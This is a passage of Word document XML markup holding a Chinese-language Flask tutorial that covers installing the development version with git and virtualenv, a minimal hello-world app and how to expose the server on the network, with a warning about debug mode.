      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并运行在开发模式下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F180EE8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7900A189" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$ git clone http://github.com/mitsuhiko/flask.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2841FB02" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Initialized empty Git repository in ~/dev/flask/.git/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0647477C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$ cd flask</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778E05A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$ virtualenv venv --distribute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7C0547" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>New python executable in venv/bin/python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E34964" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Installing distribute............done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28833794" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$ . venv/bin/activate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF7EFB9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$ python setup.py develop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB46692" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CFCB20" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Finished processing dependencies for Flask</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B06D88" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6266CB41" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这会拉取依赖并激活</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> git head </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> virtualenv </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的当前版本。然后你只需要执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> git pull origin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来升级到最新版本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C905615" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68431275" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> git </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，获取开发版本的替代操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7028007F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49A7FADA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$ mkdir flask</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4F5AA1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$ cd flask</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B54BFBC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$ virtualenv venv --distribute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4C62B2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$ . venv/bin/activate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16730083" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>New python executable in venv/bin/python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E75DC2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Installing distribute............done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B04AFD8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$ pip install Flask==dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDADF8B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BE8475" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Finished processing dependencies for Flask==dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EC2F61" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AE282E4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="575" w:name="_Toc159780008"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>样例</w:t>
      </w:r>
      <w:bookmarkEnd w:id="575"/>
    </w:p>
    <w:p w14:paraId="6EC438D2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最小</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C4C1E1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F4EBCAA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>```hello.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA89D32" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from flask import Flask</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A38665" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>app = Flask(__name__)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696794A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45BE9AD7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>@app.route('/')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C471195" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def hello_world():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7A550D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    return 'Hello World!'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291D97FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F5C643A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467E026D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    app.run()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2FE517" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277486DD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>确保你的应用文件名不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> flask.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>，因为这将与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Flask </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>本身冲突。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C668827" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44821F07" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>这段代码做了什么？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EED27BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先，我们导入了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Flask </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类。这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>类的实例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将会是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>我们的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> WSGI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>应用程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1A291E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来，我们创建一个该类的实例，第一个参数是应用模块或者包的名称。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你使用单一的模块（如本例），你应该使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> __name__ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因为模块的名称将会因其作为单独应用启动还是作为模块导入而有不同（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也即是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> '__main__' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或实际的导入名）。这是必须的，这样</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Flask </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>才知道到哪去找模板、静态文件等等。详情见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Flask </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的文档。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A84B3A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后，我们使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> route() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>装饰器告诉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Flask </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>什么样的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能触发我们的函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145AB622" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个函数的名字也在生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时被特定的函数采用，这个函数返回我们想要显示在用户浏览器中的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7709E375" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后我们用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> run() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数来让应用运行在本地服务器上。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> if __name__ == '__main__': </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确保服务器只会在该脚本被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解释器直接执行的时候才会运行，而不是作为模块导入的时候。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5167E6AE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何让外部可访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A097FB3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你运行了这个服务器，你会发现它只能从你自己的计算机上访问，网络中其它任何的地方都不能访问。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>在调试模式下，用户可以在你的计算机上执行任意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。因此，这个行为是默认的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7974AB60" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>禁用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> debug </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>信任你所在网络的用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，你可以简单修改调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> run() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的方法使你的服务器公开可用，如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDF684E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>app.run(host='0.0.0.0')</w:t>
      </w:r>
    </w:p>
